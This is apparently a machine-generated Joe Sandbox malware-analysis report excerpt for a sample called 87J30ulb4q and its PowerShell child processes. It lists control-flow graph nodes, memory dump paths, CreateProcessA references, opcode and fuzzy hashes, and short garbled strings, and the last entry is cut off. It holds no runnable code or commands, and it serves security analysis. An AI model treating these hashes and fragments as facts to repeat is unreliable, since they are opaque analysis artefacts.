                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                    Execution Graph

                                    Execution Coverage:13.1%
                                    Dynamic/Decrypted Code Coverage:100%
                                    Signature Coverage:0%
                                    Total number of Nodes:3
                                    Total number of Limit Nodes:0
                                    execution_graph 4954 a57958 4955 a579ec CreateProcessA 4954->4955 4957 a57bb8 4955->4957 4957->4957

                                    Control-flow Graph

                                    control_flow_graph 313 a54c78-a54cde 315 a54ce0-a54ceb 313->315 316 a54d28-a54d2a 313->316 315->316 317 a54ced-a54cf9 315->317 318 a54d2c-a54d45 316->318 319 a54d1c-a54d26 317->319 320 a54cfb-a54d05 317->320 324 a54d47-a54d53 318->324 325 a54d91-a54d93 318->325 319->318 322 a54d07 320->322 323 a54d09-a54d18 320->323 322->323 323->323 326 a54d1a 323->326 324->325 327 a54d55-a54d61 324->327 328 a54d95-a54ded 325->328 326->319 329 a54d84-a54d8f 327->329 330 a54d63-a54d6d 327->330 337 a54e37-a54e39 328->337 338 a54def-a54dfa 328->338 329->328 331 a54d71-a54d80 330->331 332 a54d6f 330->332 331->331 334 a54d82 331->334 332->331 334->329 339 a54e3b-a54e53 337->339 338->337 340 a54dfc-a54e08 338->340 347 a54e55-a54e60 339->347 348 a54e9d-a54e9f 339->348 341 a54e2b-a54e35 340->341 342 a54e0a-a54e14 340->342 341->339 343 a54e16 342->343 344 a54e18-a54e27 342->344 343->344 344->344 346 a54e29 344->346 346->341 347->348 350 a54e62-a54e6e 347->350 349 a54ea1-a54ef2 348->349 358 a54ef8-a54f06 349->358 351 a54e91-a54e9b 350->351 352 a54e70-a54e7a 350->352 351->349 354 a54e7c 352->354 355 a54e7e-a54e8d 352->355 354->355 355->355 356 a54e8f 355->356 356->351 359 a54f0f-a54f6f 358->359 360 a54f08-a54f0e 358->360 367 a54f71-a54f75 359->367 368 a54f7f-a54f83 359->368 360->359 367->368 369 a54f77 367->369 370 a54f85-a54f89 368->370 371 a54f93-a54f97 368->371 369->368 370->371 372 a54f8b 370->372 373 a54fa7-a54fab 371->373 374 a54f99-a54f9d 371->374 372->371 376 a54fad-a54fb1 373->376 377 a54fbb-a54fbf 373->377 374->373 375 a54f9f-a54fa2 call a503d4 374->375 375->373 376->377 379 a54fb3-a54fb6 call a503d4 376->379 380 a54fc1-a54fc5 377->380 381 a54fcf-a54fd3 377->381 379->377 380->381 383 a54fc7-a54fca call a503d4 380->383 384 a54fd5-a54fd9 381->384 385 a54fe3-a54fe7 381->385 383->381 384->385 387 a54fdb 384->387 388 a54ff7 385->388 389 a54fe9-a54fed 385->389 387->385 391 a54ff8 388->391 389->388 390 a54fef 389->390 390->388 391->391
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1335881902.0000000000A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_a50000_87J30ulb4q.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: \V]m
                                    • API String ID: 0-4105700344
                                    • Opcode ID: 94c5747883552d0f597ddac55e440d459947d192758afa0ebbdeaad04117f8cd
                                    • Instruction ID: c829fdd9c9c304b05131ba01e005c8e7f7dd565d635de375597c1b50624c1139
                                    • Opcode Fuzzy Hash: 94c5747883552d0f597ddac55e440d459947d192758afa0ebbdeaad04117f8cd
                                    • Instruction Fuzzy Hash: CBB15F71E002099FDB14CFA9C8857DDBBF2BF8C719F148529E815E7294EB749889CB41

                                    Control-flow Graph

                                    control_flow_graph 603 a55548-a555ae 605 a555b0-a555bb 603->605 606 a555f8-a555fa 603->606 605->606 608 a555bd-a555c9 605->608 607 a555fc-a55615 606->607 615 a55617-a55623 607->615 616 a55661-a55663 607->616 609 a555ec-a555f6 608->609 610 a555cb-a555d5 608->610 609->607 611 a555d7 610->611 612 a555d9-a555e8 610->612 611->612 612->612 614 a555ea 612->614 614->609 615->616 618 a55625-a55631 615->618 617 a55665-a5567d 616->617 624 a556c7-a556c9 617->624 625 a5567f-a5568a 617->625 619 a55654-a5565f 618->619 620 a55633-a5563d 618->620 619->617 622 a55641-a55650 620->622 623 a5563f 620->623 622->622 626 a55652 622->626 623->622 628 a556cb-a556e3 624->628 625->624 627 a5568c-a55698 625->627 626->619 629 a556bb-a556c5 627->629 630 a5569a-a556a4 627->630 635 a556e5-a556f0 628->635 636 a5572d-a5572f 628->636 629->628 631 a556a6 630->631 632 a556a8-a556b7 630->632 631->632 632->632 634 a556b9 632->634 634->629 635->636 638 a556f2-a556fe 635->638 637 a55731-a557a4 636->637 647 a557aa-a557b8 637->647 639 a55721-a5572b 638->639 640 a55700-a5570a 638->640 639->637 642 a5570c 640->642 643 a5570e-a5571d 640->643 642->643 643->643 644 a5571f 643->644 644->639 648 a557c1-a55821 647->648 649 a557ba-a557c0 647->649 656 a55831-a55835 648->656 657 a55823-a55827 648->657 649->648 659 a55845-a55849 656->659 660 a55837-a5583b 656->660 657->656 658 a55829 657->658 658->656 662 a55859-a5585d 659->662 663 a5584b-a5584f 659->663 660->659 661 a5583d 660->661 661->659 665 a5586d-a55871 662->665 666 a5585f-a55863 662->666 663->662 664 a55851 663->664 664->662 668 a55881-a55885 665->668 669 a55873-a55877 665->669 666->665 667 a55865 666->667 667->665 671 a55895 668->671 672 a55887-a5588b 668->672 669->668 670 a55879-a5587c call a503d4 669->670 670->668 676 a55896 671->676 672->671 674 a5588d-a55890 call a503d4 672->674 674->671 676->676
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1335881902.0000000000A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_a50000_87J30ulb4q.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 489f4a6b116714fb9c147b3ebe62802b691323501669de012105d8801bf91fa6
                                    • Instruction ID: 4a85cf679919ce9aa0fd2ca9f9bc1ce18631e7a16d3aba67f56ac54d22f7f60d
                                    • Opcode Fuzzy Hash: 489f4a6b116714fb9c147b3ebe62802b691323501669de012105d8801bf91fa6
                                    • Instruction Fuzzy Hash: C2B17B70E00609CFDB10CFB9C99579DBBF2BF88315F288529D815EB294EB749849DB81

                                    Control-flow Graph

                                    control_flow_graph 201 a5794c-a579f8 203 a57a31-a57a51 201->203 204 a579fa-a57a04 201->204 211 a57a53-a57a5d 203->211 212 a57a8a-a57ab9 203->212 204->203 205 a57a06-a57a08 204->205 206 a57a2b-a57a2e 205->206 207 a57a0a-a57a14 205->207 206->203 209 a57a16 207->209 210 a57a18-a57a27 207->210 209->210 210->210 214 a57a29 210->214 211->212 213 a57a5f-a57a61 211->213 220 a57af2-a57bb6 CreateProcessA 212->220 221 a57abb-a57ac5 212->221 215 a57a84-a57a87 213->215 216 a57a63-a57a6d 213->216 214->206 215->212 218 a57a71-a57a80 216->218 219 a57a6f 216->219 218->218 222 a57a82 218->222 219->218 231 a57bbf-a57c3d 220->231 232 a57bb8-a57bbe 220->232 221->220 223 a57ac7-a57ac9 221->223 222->215 225 a57aec-a57aef 223->225 226 a57acb-a57ad5 223->226 225->220 227 a57ad7 226->227 228 a57ad9-a57ae8 226->228 227->228 228->228 230 a57aea 228->230 230->225 239 a57c4d-a57c51 231->239 240 a57c3f-a57c43 231->240 232->231 242 a57c61-a57c65 239->242 243 a57c53-a57c57 239->243 240->239 241 a57c45-a57c48 call a501c4 240->241 241->239 246 a57c75-a57c79 242->246 247 a57c67-a57c6b 242->247 243->242 245 a57c59-a57c5c call a501c4 243->245 245->242 250 a57c8b-a57c92 246->250 251 a57c7b-a57c81 246->251 247->246 249 a57c6d-a57c70 call a501c4 247->249 249->246 252 a57c94-a57ca3 250->252 253 a57ca9 250->253 251->250 252->253 256 a57caa 253->256 256->256
                                    APIs
                                    • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00A57BA3
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1335881902.0000000000A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_a50000_87J30ulb4q.jbxd
                                    Similarity
                                    • API ID: CreateProcess
                                    • String ID:
                                    • API String ID: 963392458-0
                                    • Opcode ID: 84d23bbd9a00a85731a86bfdc958412fb19b3315d3d6e48f518b738facc86204
                                    • Instruction ID: 2c1b475aa405d3cb3bf18f99f0496aff9f3878f5471b60253a6e698e82ca56cd
                                    • Opcode Fuzzy Hash: 84d23bbd9a00a85731a86bfdc958412fb19b3315d3d6e48f518b738facc86204
                                    • Instruction Fuzzy Hash: 92A16C70D0461A9FDB20CF69D881BEDBBF1BF48301F1481AAD859B7240DB749A89CF91

                                    Control-flow Graph

                                    control_flow_graph 257 a57958-a579f8 259 a57a31-a57a51 257->259 260 a579fa-a57a04 257->260 267 a57a53-a57a5d 259->267 268 a57a8a-a57ab9 259->268 260->259 261 a57a06-a57a08 260->261 262 a57a2b-a57a2e 261->262 263 a57a0a-a57a14 261->263 262->259 265 a57a16 263->265 266 a57a18-a57a27 263->266 265->266 266->266 270 a57a29 266->270 267->268 269 a57a5f-a57a61 267->269 276 a57af2-a57bb6 CreateProcessA 268->276 277 a57abb-a57ac5 268->277 271 a57a84-a57a87 269->271 272 a57a63-a57a6d 269->272 270->262 271->268 274 a57a71-a57a80 272->274 275 a57a6f 272->275 274->274 278 a57a82 274->278 275->274 287 a57bbf-a57c3d 276->287 288 a57bb8-a57bbe 276->288 277->276 279 a57ac7-a57ac9 277->279 278->271 281 a57aec-a57aef 279->281 282 a57acb-a57ad5 279->282 281->276 283 a57ad7 282->283 284 a57ad9-a57ae8 282->284 283->284 284->284 286 a57aea 284->286 286->281 295 a57c4d-a57c51 287->295 296 a57c3f-a57c43 287->296 288->287 298 a57c61-a57c65 295->298 299 a57c53-a57c57 295->299 296->295 297 a57c45-a57c48 call a501c4 296->297 297->295 302 a57c75-a57c79 298->302 303 a57c67-a57c6b 298->303 299->298 301 a57c59-a57c5c call a501c4 299->301 301->298 306 a57c8b-a57c92 302->306 307 a57c7b-a57c81 302->307 303->302 305 a57c6d-a57c70 call a501c4 303->305 305->302 308 a57c94-a57ca3 306->308 309 a57ca9 306->309 307->306 308->309 312 a57caa 309->312 312->312
                                    APIs
                                    • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00A57BA3
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1335881902.0000000000A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_a50000_87J30ulb4q.jbxd
                                    Similarity
                                    • API ID: CreateProcess
                                    • String ID:
                                    • API String ID: 963392458-0
                                    • Opcode ID: f51ea5c9e660f663085d1ad02c7a7d16bc2ace063dd8be7cd7e00c2e30402aeb
                                    • Instruction ID: 3bb738b6dce609f3e82d7381d827372ff11e9713285c22463b3ff29f63218035
                                    • Opcode Fuzzy Hash: f51ea5c9e660f663085d1ad02c7a7d16bc2ace063dd8be7cd7e00c2e30402aeb
                                    • Instruction Fuzzy Hash: 04914C71D0461A9FDB20CF69D881BDDBBB1BF48311F1481AADC58B7240DB749A89CF91
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1335685804.00000000009BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 009BD000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_9bd000_87J30ulb4q.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: bdd1796ba3035e6720852c67c07a3f876d198cd0e505abb78e0b94d61e1a3c0d
                                    • Instruction ID: 4c8ce92e95d722c059bed692c200dec47294d8f1171a90e30b15f8ffe40ac95d
                                    • Opcode Fuzzy Hash: bdd1796ba3035e6720852c67c07a3f876d198cd0e505abb78e0b94d61e1a3c0d
                                    • Instruction Fuzzy Hash: 16216A71501200DFCB15DF04CAC0F56BF66FB98324F24C968E8090B2A6D33AE816C7A1
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1335685804.00000000009BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 009BD000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_9bd000_87J30ulb4q.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 555e834afbd1c2fd5414379b306259fbfd17fcb6917d78cd3ce2a61b5f371944
                                    • Instruction ID: bda56cde08eb64897b349228478b60061349ab165b1ab51adc46598f121bcbec
                                    • Opcode Fuzzy Hash: 555e834afbd1c2fd5414379b306259fbfd17fcb6917d78cd3ce2a61b5f371944
                                    • Instruction Fuzzy Hash: 46112672504280DFCB16CF00DAC0B56BF72FB94324F24C6A9DC094B666C33AD85ACBA1
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1335881902.0000000000A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_a50000_87J30ulb4q.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: XPyq
                                    • API String ID: 0-2596165108
                                    • Opcode ID: 6b8554dff5dd1bb5e4e24103c238880e70270c1f13b742a838919c8d5a323927
                                    • Instruction ID: 6c7a7197602cdbdc7b0223a81432a4b52320b09fc97ae6237f9d022c47ae526a
                                    • Opcode Fuzzy Hash: 6b8554dff5dd1bb5e4e24103c238880e70270c1f13b742a838919c8d5a323927
                                    • Instruction Fuzzy Hash: 47817C74F082589BCB08EFB8985477EBBB3BBC8701F54C42AD406E7298DE3588069791
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1335881902.0000000000A50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A50000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_a50000_87J30ulb4q.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: \V]m
                                    • API String ID: 0-4105700344
                                    • Opcode ID: 1ea3b64477356d00703f100326a5a0dd2bb88c4c256bdea92015b2d607379273
                                    • Instruction ID: d1958288f54cecd4b85b2ded59fbb5a8fff0c6b24ec1b853ed07c1794240066c
                                    • Opcode Fuzzy Hash: 1ea3b64477356d00703f100326a5a0dd2bb88c4c256bdea92015b2d607379273
                                    • Instruction Fuzzy Hash: 3C918270E00209DFDF14CFA9C9857DEBBF2BF88359F148529D805AB254EB749889CB85
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000008.00000002.1317621887.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_8_2_7370000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: 4'eq$4'eq$4'eq$4'eq$4'eq$4'eq$$eq$$eq$$eq
                                    • API String ID: 0-106650353
                                    • Opcode ID: f273233a6d49b7c32a3095ec8cd12539f474eb1f48aa7ba82eca6235aa089763
                                    • Instruction ID: a8582ea093e8c92b7d384e8def76100e1328d299c4fd433d462b3110ab8e22b3
                                    • Opcode Fuzzy Hash: f273233a6d49b7c32a3095ec8cd12539f474eb1f48aa7ba82eca6235aa089763
                                    • Instruction Fuzzy Hash: D3D12BF17042499FEB799A79C8106BBBBE6EF82210F1480ABD459CF251DB39C941C7A1
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000008.00000002.1317621887.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_8_2_7370000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: 4'eq$4'eq$4'eq$4'eq
                                    • API String ID: 0-733111579
                                    • Opcode ID: 84789e403023ae42bbb4aef15bb26161e86a705a2bea13362042de5b255d06a6
                                    • Instruction ID: 7ac999e1cc93abf2709ad684c063a2980dda932c7f54abe215174f25bef7aedb
                                    • Opcode Fuzzy Hash: 84789e403023ae42bbb4aef15bb26161e86a705a2bea13362042de5b255d06a6
                                    • Instruction Fuzzy Hash: 532228F17042558FEB358B798811A6BBBF6BF82310F1480AAD509DF652DB3AC941C7A1
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000008.00000002.1317621887.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_8_2_7370000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: 4'eq$4'eq$$eq
                                    • API String ID: 0-1289891723
                                    • Opcode ID: 5f9ec70bd3b2947e4193325d5746348a0badaf84315f9455b24c429139f04499
                                    • Instruction ID: ff88a5058fd32ab4466959b0d671d74daa7bc951f22cc904247592a7046b9832
                                    • Opcode Fuzzy Hash: 5f9ec70bd3b2947e4193325d5746348a0badaf84315f9455b24c429139f04499
                                    • Instruction Fuzzy Hash: 22513DF27143498FEB319A698C117777BF6BFC6211F1481AAD609CB291DB39C841C762
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000008.00000002.1317621887.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_8_2_7370000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: 4'eq
                                    • API String ID: 0-1552367303
                                    • Opcode ID: efe784549a552d33fb13667a60236b93a6bf17887136a58957959cea7bfcf78b
                                    • Instruction ID: 4bf0994e227a2984d455967aa3e4bd71ab5915ed01fd79dcff1181a6c546ede3
                                    • Opcode Fuzzy Hash: efe784549a552d33fb13667a60236b93a6bf17887136a58957959cea7bfcf78b
                                    • Instruction Fuzzy Hash: BA21F2F291620ADFEB308E148800BB77BF5ABC2610F1543A6D609CB251D33DCA41CBA2
                                    Memory Dump Source
                                    • Source File: 00000008.00000002.1307865269.0000000000DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DE0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_8_2_de0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 595dd3f8c92080519da1d0698fbd1f1f7a58c4db505b00068b551d08df434b1b
                                    • Instruction ID: cdc39dcac98e4b0f4abf9bfe8ead3cb7e86eb5ddb08dadf212f22be221282818
                                    • Opcode Fuzzy Hash: 595dd3f8c92080519da1d0698fbd1f1f7a58c4db505b00068b551d08df434b1b
                                    • Instruction Fuzzy Hash: 06229EA190D7D19FCB03EB29D8A05EA7FB0AF4A354B0A41C7D484CF1A3D6249D49C7B2
                                    Memory Dump Source
                                    • Source File: 00000008.00000002.1307865269.0000000000DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DE0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_8_2_de0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: c4434e887d632a497ba11bfb8759654b14113667d9e62a7d428d627ba1eac8f5
                                    • Instruction ID: bd06134be6c2555ae650755bef636146cad662b75d1532dad0066d42e39d3c06
                                    • Opcode Fuzzy Hash: c4434e887d632a497ba11bfb8759654b14113667d9e62a7d428d627ba1eac8f5
                                    • Instruction Fuzzy Hash: 6ED1F574A012499FCB05DFA9D484A9EFBF2FF88310F258159E814AB365C771ED81CBA0
                                    Memory Dump Source
                                    • Source File: 00000008.00000002.1307865269.0000000000DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DE0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_8_2_de0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: c219cc21b7c21441c56e48a8bfacac79aa03cd5e741cc5e565fcac5326be7ba6
                                    • Instruction ID: 8d53af3c1bdd36d184133e75ea119268a09ee351cd0bc8e325111570dd2ffa07
                                    • Opcode Fuzzy Hash: c219cc21b7c21441c56e48a8bfacac79aa03cd5e741cc5e565fcac5326be7ba6
                                    • Instruction Fuzzy Hash: A991AD70A002458FCB15DF5DC4949BEFBB6FF48310B288669D815AB7A5C735EC41CBA0
                                    Memory Dump Source
                                    • Source File: 00000008.00000002.1317621887.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_8_2_7370000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: b70922af647ff57ee89f23d75f327cec3604e0673dfa9c71c2d7c462e585cb32
                                    • Instruction ID: cca11c070ec6738a01cd503c11ab514f1ff8b0bba436bccb959e2439af62c1a6
                                    • Opcode Fuzzy Hash: b70922af647ff57ee89f23d75f327cec3604e0673dfa9c71c2d7c462e585cb32
                                    • Instruction Fuzzy Hash: 0D41F5F1A00345CFEB318B258C41A6B7BF6BB86214F1980A6D909AF252D73ED941C7A1
                                    Memory Dump Source
                                    • Source File: 00000008.00000002.1307626782.0000000000D3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D3D000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_8_2_d3d000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 9f9290a83c168cf450530d9cbbf252fd34378977598f0db70be7d3c696765fee
                                    • Instruction ID: 1d0d14c0484a09125106071a5ad5e7a2ccef654b6945c59907dd6fe41b878856
                                    • Opcode Fuzzy Hash: 9f9290a83c168cf450530d9cbbf252fd34378977598f0db70be7d3c696765fee
                                    • Instruction Fuzzy Hash: FE01DB71405344AEE7248A26EC84B67BFA8DF45B24F1CC51AED494F142C679DD41CEB1
                                    Memory Dump Source
                                    • Source File: 00000008.00000002.1307626782.0000000000D3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D3D000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_8_2_d3d000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: e53e2611e45a5b9a55ac0e1516462ccc214046a1394650f8539a0eaafa25911b
                                    • Instruction ID: 4eb729b6d6f233324a843892b4c647fbc2bfeacc1452372f3a78deead6368749
                                    • Opcode Fuzzy Hash: e53e2611e45a5b9a55ac0e1516462ccc214046a1394650f8539a0eaafa25911b
                                    • Instruction Fuzzy Hash: 8E014C6200E3C09FE7178B259C94A52BFB4DF53624F1D81DBE9888F1A3C2695849CB72
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000008.00000002.1317621887.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_8_2_7370000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: 4'eq$4'eq$tPeq$tPeq$$eq$$eq$Ol$Ol$Ol$Ol
                                    • API String ID: 0-1790282302
                                    • Opcode ID: d0ccd875ea9791f7d5a7ec71fcd8344e915c3ab307001f91bd6d4d7db58a977b
                                    • Instruction ID: 47bcef6557ca3a999f8a180fd533b1ccc3608f5d688b296235300552479a8e07
                                    • Opcode Fuzzy Hash: d0ccd875ea9791f7d5a7ec71fcd8344e915c3ab307001f91bd6d4d7db58a977b
                                    • Instruction Fuzzy Hash: 51F12BB3B0421A9FDB718A79C81166BBBF6EFC6210F1480AAD449CF251DB35DD41C7A2
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000008.00000002.1317621887.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_8_2_7370000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: 4'eq$4'eq$tPeq$tPeq$#Ik$$eq$$eq$$eq$Ol$Ol
                                    • API String ID: 0-937668305
                                    • Opcode ID: 02e1e2ed2dc768d1628937d9c59c7c80310963b9677c1098f14f23b54aaf7fdb
                                    • Instruction ID: d3045a797675fee4cf0438ab5c34b589c79ed1cae50956f571420748373a6efd
                                    • Opcode Fuzzy Hash: 02e1e2ed2dc768d1628937d9c59c7c80310963b9677c1098f14f23b54aaf7fdb
                                    • Instruction Fuzzy Hash: 4FA148F27043468FEB394A79881067BBBE69FC2210F1880ABD549DF791DB39C841C7A1
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000008.00000002.1317621887.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_8_2_7370000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: $eq$$eq$$eq$$eq
                                    • API String ID: 0-812946093
                                    • Opcode ID: bad2db6f6597332e67af22f1cbebb67524cd5e5c8470c08cc4b8c6962068560e
                                    • Instruction ID: f7c0284f6642612b7bb8d465893788b67830d153ec00cc60721cd1d9d213fbd0
                                    • Opcode Fuzzy Hash: bad2db6f6597332e67af22f1cbebb67524cd5e5c8470c08cc4b8c6962068560e
                                    • Instruction Fuzzy Hash: 9121F9B17102969BEB74957A8C41B77ABDB9BC2711F24842A950DCB3C1DD3DC841D361
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000008.00000002.1317621887.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_8_2_7370000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: $eq$$eq$Ol$Ol
                                    • API String ID: 0-2707021774
                                    • Opcode ID: b23f605c92d4ed824bce5b5b3740eb0c90a847368fcdf6baffc1d710076a56a5
                                    • Instruction ID: 675bd3d27de3b8ef4e707b33c6befc7cc7f460c9b72510f7aba8c9612061da9f
                                    • Opcode Fuzzy Hash: b23f605c92d4ed824bce5b5b3740eb0c90a847368fcdf6baffc1d710076a56a5
                                    • Instruction Fuzzy Hash: 11115CB170428A9BFF30862EC840B27BB97ABC1320F25C52AE54CCB380CA36C441D751
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000008.00000002.1317621887.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_8_2_7370000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: 4'eq$4'eq$$eq$$eq
                                    • API String ID: 0-3287427201
                                    • Opcode ID: a13c7448be47b551c4b2030513703eaa9b0291f9fd59d064b5ee1fde268f9ceb
                                    • Instruction ID: 4711818fce6739467df2b67cfe6c6a4e90126c43227f81dbb095aac10c28eda5
                                    • Opcode Fuzzy Hash: a13c7448be47b551c4b2030513703eaa9b0291f9fd59d064b5ee1fde268f9ceb
                                    • Instruction Fuzzy Hash: C31108B17093968FFB7F563868201AA6FB65BC225071A0197D009DF296CA2E4D85C7A2
                                    Memory Dump Source
                                    • Source File: 00000009.00000002.1458599476.00007FFE7CFC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7CFC0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_9_2_7ffe7cfc0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 0b60ff8f35fdc32f1d8fde1c49a5000e639a7c001fbcce2aee33bce30e976418
                                    • Instruction ID: e47adf9b98c09165df24af7f4cbdda4db96a446b0d47aec94f9948185f91d156
                                    • Opcode Fuzzy Hash: 0b60ff8f35fdc32f1d8fde1c49a5000e639a7c001fbcce2aee33bce30e976418
                                    • Instruction Fuzzy Hash: 2131169699E7C24FE36B47384C681917FB89F53224B1E81FBD0A48A5F3D94C081AC322
                                    Memory Dump Source
                                    • Source File: 00000009.00000002.1458599476.00007FFE7CFC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7CFC0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_9_2_7ffe7cfc0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: bce3899feb8e623405f64dd22be16d12af2f5e1858ad6766a2910fc03519c454
                                    • Instruction ID: 2257d43f12dc983d9b8cc2c2a7b590cdebe066d195ca4d57a1e3b2e76ebc9fc8
                                    • Opcode Fuzzy Hash: bce3899feb8e623405f64dd22be16d12af2f5e1858ad6766a2910fc03519c454
                                    • Instruction Fuzzy Hash: 2131129299E7C24FD35747384C282957FF89F53220B0A41EBD0A8CB5F3E95C081AC322
                                    Memory Dump Source
                                    • Source File: 00000009.00000002.1457802485.00007FFE7CEF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFE7CEF0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_9_2_7ffe7cef0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                    • Instruction ID: ec40cd65ba160b7aa92ac2a2b2584e4b5bc270b447d14ff5b59f8d432ae61055
                                    • Opcode Fuzzy Hash: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
